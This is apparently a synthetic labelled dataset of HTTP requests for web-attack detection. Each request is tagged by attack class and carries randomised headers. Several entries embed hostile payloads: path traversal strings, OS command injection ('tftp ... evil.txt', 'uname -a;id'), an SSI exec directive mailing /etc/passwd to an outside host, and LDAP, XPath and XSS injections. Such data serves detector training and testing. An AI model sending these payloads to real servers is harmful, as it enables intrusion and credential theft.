Date: Mon, 12 Sep 05 22:39:51 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Tue, 09 Mar 10 16:07:31 UTC
If-Match: "pHP@OoUHnrHh4Xyypk8C"
If-None-Match: *
If-Range: *
Max-Forwards: 389
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest nc=dae49E08
Range: -728027,84041-8,736156-
Referer: http://www.Yh1sN.uk/ehiao/nohn/5othb/lIshcr2.php4
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (X11; U; SunOS sun4u 1.6; jw-ov; rv:2.4.9) Gecko/58036346
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41983
Start - Id: 45271
class: PathTransversal
GET /scG4.mWj0HRm0KG-raA/siuantht9eeo2hiwpiov.exe? HTTP/1.1
Host: www.dierumhrb.it
Connection: scdiE
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: /../../../Inetpub/iissamples/ma/enista/liteie/trilnsteer.sh
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 18.112.247.83
Cookie: eeSknTesrucem=nPcRJEd_mLwm;yrS6mh=1072331;raiLa9ctotsmd=e9]zaaccess_logte;cboa7cSoooynwl2=tt9ob;retdsainowag4=ewamrXros;R4tonagh0Ttvga=cd6ADia
Cookie2: $Version="48"
Date: Tue, 04 Jan 05 23:16:22 GMT
ETag: W/"GdPyX5kqoNwtgLKVl"
Expect: elrv
From: ra7rtweh@ttrsy.org
If-Modified-Since: Sat, 24 Apr 04 18:18:58 GMT
If-Unmodified-Since: Tue, 19 Apr 05 20:57:38 GMT
If-Match: "bBzfHYPro9Fw4_gcUf8"
If-None-Match: "mNSGCGHP6b9xmItJ"
If-Range: Sat, 05 Jan 08 20:32:54 CET
Max-Forwards: 6091
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: NTLM WWV0eW9zZWR5U2tFdGhzZWw5aWZ0Y3NzdThvaGFzbDF0cncwVmhldGE=
Range: 259-814,-6312
Referer: http://in5iAide.net/loonellf/eme1oal/vernyyS9/Amem/csateH.css
TE: trailers,chunked,deflate;q=0.1
User-Agent: csurYiMbi/8.2.2.8
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 351x9114
Via: ef6n/9.5 www.d5cktrkn.html, 4.6 106.114.112.249
Transfer-Encoding: ebhIt3; siDelcnc=oXot
Upgrade: rY7u/3.8, gk6/3.2, o8xHs/4.5, eog/8.6
----: ------------------

null

End - Id: 45271
Start - Id: 44774
class: PathTransversal
GET /e.o3ExWueiAR6qWs8mSn/ds/rabQie9g2ske91io/yO.WP/cqBlLeBIyHL/xeEtryttIdi0/LCBAS/unQFFdnezCxOHDZ/eyPGYWdQcG/iyU.php3?lto=zeDSgzSItc7gqedtls&rlqhor=wauomcioetioSs&hn1h1gsmauenle=doc%28++file%3A%2F%2F%2Fc%3A%2Fes%2Fnsuoa.xml++++%29&kiogen=65&mBhdot=3&iframe3QJFztb=714328&U8vbscript1=1%7Er&Ihnyhn2=5518132&S0u=8159 HTTP/1.0
Host: 254.145.96.29
Connection: vpMlPo4
Accept: audio/*, video/mpeg, video/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=17942
Client-ip: 7.176.110.139
Cookie: eenru7er=aaeei;lydnwkcir=uRuhtq&5tJEhenV;efxssm=90;Ena1gqdgmAg=un
Cookie2: $Version="7"
Date: Wed, 23 Sep 09 22:04:49 CET
ETag: W/"1moiL3zP1yW7wCq50"
Expect: 100-continue
From: sfn2@eoeOs.net
If-Modified-Since: Fri, 22 Jun 07 05:00:22 UTC
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: "6swJW686489nu8vGnDm"
If-None-Match: "Ks7Z-O88BuIHpSXjG"
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 94
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 6578-336232,-258470,45228-5909
Referer: http://www.AsqS.cz/vnsmi.tiff
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 0.7; nh-x9; rv:7.3.9) Gecko/94956579
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: gzip
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44774
Start - Id: 44572
class: OsCommanding
POST /h52Ajmsnmv9taga/reet4C6d7edttniaSdi/M88i/fHaVKsfd/Htrbaoatm2ilm5TmeT6/tge7haentenpwd0adA/a0etm.asmx? HTTP/1.0
Content-Length: 245
Content-Language: ahl4
Content-Encoding: deflate
Content-Location: /efnae/etierhs/tgfaeuSa/Tclu1dk.php3
Content-MD5: cnBkZGVzbzE5OHZld2hmbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 17:04:01 UTC
Last-Modified: Wed, 10 Aug 05 18:32:57 GMT
Host: 15.180.11.123:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, iso-8859-9, x-mac-cyrillic, iso-8859-9;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: hnuinFek-tiTIsi
Cache-Control: min-fresh=9
Client-ip: 145.157.177.78
Cookie: na=ooofA)agggeoq;ltttvngemy=jhienbsso;en9c=4669404848;bdaeh=81891;8Cwiit=hiiBcartn;n6civEulI=0Etra
Cookie2: $Version="87"
Date: Tue, 08 Feb 05 15:15:12 GMT
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Thu, 20 Mar 08 07:33:29 UTC
If-Unmodified-Since: Fri, 14 Jan 05 14:25:56 CET
If-Match: "gTPoAHpVZezeUIwt8"
If-None-Match: *
Max-Forwards: 046
MIME-Version: 1.5
Pragma: 1rr=sniomo
Proxy-Authorization: NTLM ZWJFdXhuZWNpcDhhZTBob21lcmdhQWxuQnpic3RvYW5yY2E1b2Zzb3RseW5h
Authorization: Digest response="CA4Fc15cAbA7cA3FE302026C63DcaBF0"
Referer: http://eN1tntau.it/ydant/mvlaaei2/cwgibd.tiff
TE: gzip;q=0.4
Trailer: If-Range
User-Agent: bsfh0T
UA-OS: Win95
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: gzip
Upgrade: twpNt/2.7, lrl/6.7, ejpc/8.6, lnz/5.7, rncD/5.3
Warning: 447 89.193.41.117 "aad1rdltgoes0na" 
X-Forwarded-For: 21.178.56.88
----: --------------------------------

clrulIsrho3Hs=16&2nsJ=s4s&gtselshstvR=ein3eaedca8u7e&tnStraln=069&ebi7mAfGER6te=iJW00R9gr&-tX.J=75777&rrYr=250.144.221.176   |    tftp 192.168.10.33 evil.txt&Ttklrsmft=3525506330&nnUesmcsmeo=(]st&eemnceughfltsua=n3tDnme&ueltuiM=aihnrnanots

End - Id: 44572
Start - Id: 39417
class: SSI
GET /nnsOaw7SectcWe/dyCctdtee5titeta/lkaoihoiy/HNHYGsGsNZ/@Vh0/dlf4eab2bH/82eTwmr2orh/stgufilEcpx0a/Li6/iP6dxy4sorGjMl2.pl?hs4lc=ifm6aygacnjitXspe&keDH=%40l%5Cwd&nReEmod2uImpa=cnHbSreamvcht&ihyorotNauE=toeeinTh6&susf3pn=union&ace6=hc%5D-&ZULadmin=ibJ-t3&OA_xK_B4hb=uPLVi486l&4Q1RbetweenWBsz8=b%40+ds++%24ftdApmar&oilnUthtFoeecc=e.XiOp&keUnarsthC=eilnoeaxn&ClZSf16=%3C%21--%23email+fromhost%3D%22www.hteIe1.com%22+tohost%3D%22mailbox.her.com%22+message%3D%22ls9vif+itonhst+ehs7+7nmyie%22+fromaddress%3D%225eob.com%22+toaddress%3D%22temN.u9agn.com%22+subject%3D%22ct3%22+sender%3D%22ak.com%22+replyto%3D%22Dsyfe.com%22+cc%3D%22e4a%22+inreplyto%3D%22fi+cOe+bnhrwa%22+id%3D%22nsstmail%22+--%3E&s1pe=681965&eemmwte=hwadminie8%3Fbu%27re3%3F&qSfI=eahaoq4cor2 HTTP/1.0
Host: 173.92.172.99:56258
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.0
Accept-Language: S-8tr;q=0.8, ust6hfs-rwd;q=0.4, khAieec-ddead;q=0.7, cie-y
Cache-Control: no-cache
Client-ip: 123.202.136.228
Cookie: ngtnsC=t;dcslrmourmfybhi=vm;nfUws=difoatdeonsiasA;LG5bWKsmJZt=d5nmS4eN7OW;4uxT=ht&@se 
Cookie2: $Version="891"
Date: Thu, 10 Aug 06 03:51:20 GMT
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
If-Modified-Since: Fri, 10 Mar 06 20:56:58 CET
If-Unmodified-Since: Sat, 13 Sep 08 13:46:17 CET
If-Match: "lH4GhD2zg16DfzZ4Pcz"
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: Sun, 28 Feb 10 04:48:28 GMT
Max-Forwards: 8521
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic c2kyQjpnb3Zp
Range: 90-,27-,-938216
Referer: /miaaej/opmez.tiff
TE: trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 0.0; Tq-ao; rv:7.5.5) Gecko/30050300
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4162x972
Via: FTP/6.2 www.ptre4acH.html, 6.4 173.149.224.86
Transfer-Encoding: gzip
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 26981
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39417
Start - Id: 38468
class: LdapInjection
GET /l.l/agLBvvYtQ_.gif?2aNLhoistwt=liiso&SfIH9_X=14426656&5hMCg2iQm=mtsEtHcQyot&aqe0y=6771&okwH2=7&46es54UFiitz2b=%28gnFetkeahdwa&axsen6gFmnsbyim=JtNaohs%28tDieUe&napfW=LtilSoeavuii&6wpasswdEe_=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&tl3taM=ozSmz&bCLCzdzlikeC1ncQ=apKpQw HTTP/1.1
Host: 197.167.147.22
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, identity
Accept-Language: 9oEte-ysWB0it7, Wgphdi-itr2eep;q=0.5, eli2m-a, txeLTee-5ephq;q=0.8
Cache-Control: only-if-cached
Client-ip: 86.172.21.20
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Tue, 14 Sep 04 17:47:32 UTC
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Sat, 06 Aug 05 23:56:40 UTC
If-Unmodified-Since: Tue, 20 Jun 06 11:04:42 UTC
If-Match: *
If-None-Match: "RzuCa6ABr-cdfq4"
If-Range: Tue, 26 Sep 06 13:37:33 UTC
Max-Forwards: 9
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: hoec no8en=Rmneert
Range: 24-,76759-,-19589
Referer: /eiaeoe/oynhdy/boetea/fo5l/chw9o80.nsf
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: bEaem (shb5DdXF; stREXPNhHO; n-Z97U-cY; iUbCgnpE; nXnNTag)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 616 131.165.120.56:1 "csPssf" 
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38468
Start - Id: 50083
class: XPathInjection
PUT /kEinKaJ2W/tgpYtQh9JHX98kp3@k/a_/nH7ElCodH/Suykn7PULttoltaE/oEderertiwm/botibpuiQGtniedofzo/atum/amAroE0/glerhte3i.gif? HTTP/1.1
Content-Length: 42
Content-Language: siItd,nyst9uyt,ntamw9ea
Content-Encoding: gzip
Content-Location: http://1uea.uk/tsal/1se8r.mspx
Content-MD5: b2VlaGV0YzRodGhvd25sNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jan 07 06:56:05 GMT
Last-Modified: Tue, 28 Feb 06 05:53:26 UTC
Host: www.aYLae.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.2
Accept-Encoding: 
Accept-Language: diazoya-hd3s, da-2a, h-npaoditn;q=0.5, tahs1e-heJtpr1e
Cache-Control: max-age=259
Client-ip: 82.164.87.92
Cookie: tseitotc=1806 or  count(path/child::node()[position()=((i+j+k+l+1)]   | path/child::*()[position()=(k+1)])=1  or 0804=
Cookie2: $Version="0"
Date: Sat, 27 Feb 10 22:59:03 CET
ETag: "t31SLRX0H8ocwmOuxeu1"
Expect: 100-continue
From: cdn1@hrper5Rme.gov
If-Modified-Since: Thu, 31 Aug 06 15:54:13 CET
If-Unmodified-Since: Fri, 15 Feb 08 20:35:08 CET
If-Match: *
If-None-Match: "2zxp3PGDcBQp1bsUoL0"
If-Range: *
Max-Forwards: 6471
MIME-Version: 4.9
Pragma: rrbwoil=7
Proxy-Authorization: Basic b2ZlZ29uMjptYWll
Authorization: Basic ZHpjdTVhQm86aXpsZENvRGY=
Range: 5077-,0-2,69-
Referer: /c96sLz/etlnte.bin
TE: deflate;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 6.1; z7-oi; rv:4.5.0) Gecko/59428850
UA-CPU: x86
UA-Disp: 1584,447,16
UA-OS: Mac OS X
UA-Color: color16
Via: 2.7 11.178.252.86:65310, FTP/9.9 57.160.14.99, nev/9.0 133.36.209.2:17574
Transfer-Encoding: compress
Upgrade: eeEbe/6.7, haia/3.9, ajjwD/1.2, hlsos2/4.8, o1ae/5.7
Warning: 655 8.146.131.14 "dxoce5aih3rnnfYua" "Tue, 17 Oct 06 23:28:47 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ethc=112516&j@FSlWE.cusrmN=sctnennre9delyf

End - Id: 50083
Start - Id: 44048
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 114.27.198.102
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: jatad9a-csu2I, hnno-rwnNdr;q=0.4
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: gweadrIstev=omtarinf ce;a7=sdnj;ahtwmhboaoo=oMJK.
Cookie2: $Version="20"
Date: Thu, 20 Apr 06 17:28:24 GMT
ETag: W/"Li@1xMYgprnknCP5zgmr"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 04 Aug 05 06:56:41 UTC
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: Thu, 07 Sep 06 19:54:54 UTC
Max-Forwards: 66
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Basic ZW5hc2k6anJuYW9ueWE=
Range: 70-,-5,-65
Referer: /iAIAehh/fii2scn/elqgof/ttRwpt/eyt4e.exe
TE: trailers,chunked
Trailer: Authorization
User-Agent: 6ebcepa/2.8.2
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: gzip
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44048
Start - Id: 43026
class: OsCommanding
POST /mggroup byho4EreplaceCGy/eonitrqz8vasnfbLdens.jpg? HTTP/1.1
Content-Length: 59
Content-Language: Imoxiwvo,atd
Content-Encoding: gzip
Content-Location: http://eerer.biz/tdnt/untssu.txt
Content-MD5: bmJJblJtZWh3bndtZmllYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Jan 06 05:11:31 GMT
Last-Modified: Sun, 25 Jun 06 17:22:31 GMT
Host: 243.144.96.77:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4149
Client-ip: 89.141.82.219
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="9"
Date: Fri, 23 Dec 05 06:48:28 GMT
ETag: W/"w9X0IN3s8wdXjUj@6M_"
Expect: 100-continue
From: 1ke4@enu9hmpEs.ch
If-Modified-Since: Fri, 18 May 07 18:28:56 CET
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: "-jqt.BMEeUF_PqoA"
Max-Forwards: 56
Pragma: no-cache
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic MW5ydzJpOmg2cHNvNEU=
Range: -98633,070828-,-9277
Referer: /deb65aae/uii6gyen/qgUczt0.jpg
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/9.8 (Windows; U; WinNT 7.6; tt-fr; rv:2.6.7) Gecko/25523672
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 1.1 www.mdlaeei.html, HTTP/8.5 76.222.119.122, HTTP/7.3 www.iuexga.tiff
Transfer-Encoding: woe0sh
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~

rs81ilfiesk6bc=  ; echo ;   w  ;uname     -a    ;id

End - Id: 43026
Start - Id: 37899
class: LdapInjection
GET /tDA3Gp0k9EVw6/2I/e@ndfq3/ehn4hheyaioeia/6jeeyifho4eeSpeo/ut7imwAseu/1smfKk0h1/iG8hN.html?uhoa=w-l.HHGr&abRls=lE4M2nB.h&7tmnb4nnnot6c4e=h%3Fha&ohr=nT597o0&xdoc6xraoUe=6urogisxufs&trtziiE7ESwl=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&dDwTdde=SftxfsIx&rqsx=sK8GtyTDrm8 HTTP/1.1
Host: www.Caepauiu.biz
Connection: close
Accept: audio/x-wav, text/xml;q=0.7, text/html
Accept-Charset: x-mac-japanese;q=0.4, koi8-r, x-mac-roman, x-mac-chinesesimp, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 176.10.100.235
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Sat, 13 Nov 04 23:47:15 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 100-continue
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sat, 28 Feb 04 01:30:30 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:15:02 UTC
If-Match: *
If-None-Match: *
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 187
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: http://j1aedrr.biz/Laonactt/titlhyHu/my4ht.pl
TE: chunked;q=0.8,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 8.0; os-nu; rv:8.6.0) Gecko/35496689
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.2 119.228.223.248, al0nfh/7.5 185.120.69.131
Transfer-Encoding: identity
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37899
Start - Id: 37684
class: LdapInjection
PUT /zh8lPQ/LFfPNDI/eoslsrttmuohe/tyfttntslitq2q/lv7ct6etjk/mBeCITHYQ3p1TLxA/aE7L/htraaessee1wmlei.jpg? HTTP/1.0
Content-Length: 326
Content-Language: n,sxPoEn
Content-Encoding: gzip
Content-Location: http://iapunsu.de/maofT/rles/ikumuhmh.mpg
Content-MD5: MnRhdVRudWFuaWxuaXJocw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Fri, 03 Mar 06 03:09:09 CET
Host: 20.87.63.161
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 28.10.194.170
Cookie: qXrI-3w=a &fsam;alit=46qoNneEiqso;gmmwOSEnh=7esc;rs=ttesIgarph;udNs1aaaaxutpes=275855529;hldLewei=2GxF3T
Cookie2: $Version="2"
Date: Tue, 13 Oct 09 11:14:57 UTC
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sat, 08 Mar 08 22:34:11 GMT
If-Unmodified-Since: Tue, 07 Aug 07 12:24:47 UTC
If-Match: "wLm1a_x0NH7vgEw"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: "lKoXUSCoHfbo_0kJ"
Max-Forwards: 336
MIME-Version: 8.1
Pragma: hiz='engurN'
Proxy-Authorization: NTLM SWlzM250b2VobmFpc3Jlb2Exb3RnaXpnaU5vYm1ucmVyYmQ5aU5FRGhzY3JqZGs=
Authorization: Digest qop=auth
Range: 6058-6,88-,-245437
Referer: http://www.weh5u.st/5miiU/m2nnt/Dtax1/zcfGetew.png
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: axsE (aLUB-OWmWs; cqSuY2y; g8bydVXuzo)
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 940x1719
Via: uxedy/0.9 218.222.58.30
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jwl0tww=59036273&ied=96dlogipY&fsh3ttifwio3ai=besock_streampcmditX a&lemeerdhar=a&emnIoa=tmpsrnfdtbetweenow&hsSeUt=2332&btorhr5jR7slf=31953568&yo=rimi ~m/suetsallR&LPfSprocessing-instruction-X7=sFCi&wOfox4ha9r=icdrop6l;mjeglwieyois~&mtmqIaassesrs56=tNX9pzu3F&eeb47htuttpl=Rz)(&(objectClass=sdo*)&mutHxe=304

End - Id: 37684
Start - Id: 48096
class: XSS
GET /tnitRq7mRuh/hkee9tharl/20adsock_streamv0uWQ3_H%u/imlsd84I5tseofoxn/l5n/rPUT-mO9Sor4_kc/etu/14sFc-SKFCcE1/r1GyV5uxQyHJdlYCK-vX/0FEObbvvnbckVtuAPe.php?NtdoheRit9e4Eo=gnh+%26j&xp_@jxmle=o&nleeea=rTlw&hbgtseiReenrhn=875&d5cli=6625095&yregecbsesaef=nu%3B&7Hwgethomeo8.=%3Cstyle++type++++%3D+++%22++text%2Fjavascript+%22+%3E%5Balert+++%28%27ah%27%29%3B%5D%3C%2Fstyle%3E&aFstaeoIE=0n HTTP/1.0
Host: 78.211.163.34:3791
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: r1t8e=cyd
Client-ip: 148.235.193.134
Cookie: Net5fcit6yE=wascPhshda;r0y4=tlR6ae4Uu;imtkuc8aiiwlo=iscey;Roh0wi9w= iE45c?L8ozenomct;ee1cenwewc=ts5iatOotbEi;vNmbeX=rheaels
Cookie2: $Version="484"
Date: Fri, 24 Aug 07 16:04:55 UTC
ETag: "_kZg_@Z9twta657-o@Y"
Expect: 0oBnuh=bntvena
From: etsoAo6b@Dfeyr.ch
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 4797
MIME-Version: 6.3
Pragma: dhiwoohl='hccrn'
Proxy-Authorization: ijdeiT kiao=mtjnUr
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.ssrn.cz/zRiaadp/iontfdc.tar
TE: trailers,trailers
Trailer: TE
User-Agent: etFDTxqic/8.5.8.2
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: identity
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 628 213.163.87.234 "snanhhatel" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48096
Start - Id: 40133
class: SSI
GET /TraleywbwiSm/TC8qxR_3L6pVim/ss3WKdtS@5Dal5/fsANCFvoC6/sock_streamCz9ndstdinxcopylogeOi/niidrutu8h2eii3ltr/Ka7bs.gif?2s=hph&g1K9M0u%u=iX5&QDWdropH=ss&YGOkoR=ar%3AhavingbarNhb&rmochaorfQyvarsm7P=r&az=%3Earvemselectt&Akcerez=%3C%21--%23exec++++cmd%3D%22%2Fbin%2Fmail+p0.com++%3C+%2Fetc%2Fpasswd%22--%3E&bdpGo8gobibm=381248 HTTP/1.0
Host: 210.55.253.89
Connection: close
Accept: audio/*
Accept-Charset: x-mac-turkish;q=0.8, x-mac-greek;q=0.9, shift_jis, cp-936
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 246.182.239.2
Cookie: fECcNaVMDB=hmiz3:Ffbinnta;gstabore=62
Cookie2: $Version="8"
Date: Thu, 23 Oct 08 21:23:30 UTC
ETag: "b8V1OvziTD4X0YaPC"
Expect: eyrbrtI
From: PtrtE@h2sisrnd.gov
If-Modified-Since: Tue, 02 Nov 04 16:29:49 CET
If-Unmodified-Since: Tue, 14 Feb 06 14:50:34 CET
If-Match: *
If-None-Match: "epZvrM3VuYc5TvvgPQQC"
If-Range: Fri, 25 Jan 08 22:03:58 CET
Max-Forwards: 2743
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: NTLM b2xydG9uY3NuZGNDZXVObGE2bndpcnJ3aHRldHpkbUVlaXRzaWVp
Range: 86-29827,480182-539278,773981-8539
Referer: http://tt8u.com/ottnirna/oerralN.jpg
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 3.4; tc-7h; rv:3.1.2) Gecko/71997177
UA-Disp: 5908,939,32
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
